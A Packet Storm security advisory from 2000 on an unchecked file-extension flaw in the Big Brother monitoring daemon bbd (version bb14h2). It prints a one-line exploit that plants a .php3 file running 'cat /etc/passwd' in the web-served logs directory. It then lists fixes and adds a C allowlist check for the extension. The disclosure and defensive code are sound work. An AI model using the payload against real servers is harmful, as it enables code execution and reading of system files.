bb-14h2.txt

2000-07-13T00:00:00
ID PACKETSTORM:22535
Type packetstorm
Reporter Xternal
Modified 2000-07-13T00:00:00

Description

`versions affected: bb14h2 (current) and older  
  
  
exploit:  
bbd listens for incoming connections on port 1984.  
Using telnet or the bb client, it is possible to  
connect and create a filename with an arbitrary  
extension, as the extension is not rigorously checked.  
As this file is dropped into a directory accessible  
via the web server, any file extension that is parsed  
server side can be abused. For example:  
  
./bb 1.2.3.4 "status evil.php3 <?<system(\"cat  
/etc/passwd\");?>"  
  
will allow viewing of /etc/passwd upon browsing to  
http://1.2.3.4/bb/logs/evil.php3.  
  
  
solutions:  
-Modify bbd.c to allow only specified file  
extensions (.disk, .proc ...)  
  
-Implement access restrictions via  
$BBHOME/etc/security to minimize exposure to  
vulnerabilities. Unfortunately, the default install  
doesn't enable the security file.  
  
  
`
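
The first solution above (allowing only specified extensions) could be implemented as an allowlist check on the file name taken from a status message. This is an added example, not code from bbd.c or from the advisory's author; the function name, the two-entry allowlist and the permitted characters for the host part are assumptions.

```c
/* Added example: allowlist check for the file name in a "status" message.
   Hypothetical helper, not taken from bbd.c. */
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Constructed allowlist; the advisory names .disk and .proc as examples.
   A real deployment would list every test it actually runs. */
static const char *const allowed_ext[] = { "disk", "proc" };

/* Returns 1 if name is "<host>.<ext>" with ext on the allowlist, else 0. */
int status_name_allowed(const char *name)
{
    const char *dot, *p;
    size_t i;

    if (name == NULL || name[0] == '\0' || strlen(name) > 255)
        return 0;

    /* Require exactly one dot and a non-empty host part. A name such as
       "x.php3.disk" is refused because some web servers act on any
       extension in a file name, not only the last one. */
    dot = strchr(name, '.');
    if (dot == NULL || dot == name || strchr(dot + 1, '.') != NULL)
        return 0;

    /* Host part: letters, digits, '-', '_' and ',' only (assumed naming
       convention). This rejects '/', '\\', spaces and control bytes. */
    for (p = name; p < dot; p++) {
        unsigned char c = (unsigned char)*p;
        if (!isalnum(c) && c != '-' && c != '_' && c != ',')
            return 0;
    }

    /* Extension must equal an allowlist entry exactly (case-sensitive). */
    for (i = 0; i < sizeof allowed_ext / sizeof allowed_ext[0]; i++)
        if (strcmp(dot + 1, allowed_ext[i]) == 0)
            return 1;
    return 0;
}
```

The check belongs before the daemon opens the log file for writing, so a refused name never reaches the web-accessible directory.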